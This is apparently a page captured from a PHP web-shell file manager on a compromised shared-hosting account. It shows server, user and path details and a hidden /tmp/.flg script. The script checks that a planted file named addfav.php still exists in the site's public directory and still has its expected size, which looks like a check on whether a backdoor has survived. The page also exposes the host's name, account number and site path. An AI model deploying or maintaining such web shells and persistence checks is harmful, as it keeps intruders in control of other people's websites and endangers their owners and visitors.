HEX
Server: LiteSpeed
System: Linux us-imm-web1061.main-hosting.eu 4.18.0-553.109.1.lve.el8.x86_64 #1 SMP Thu Mar 5 20:23:46 UTC 2026 x86_64
User: u218692649 (218692649)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //tmp/.flg
<?php   $r = '/home/u218692649/domains/lawngreen-yak-907432.hostingersite.com/public_html'; $x = ["/addfav.php"=>"bd@@1091242@@905"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');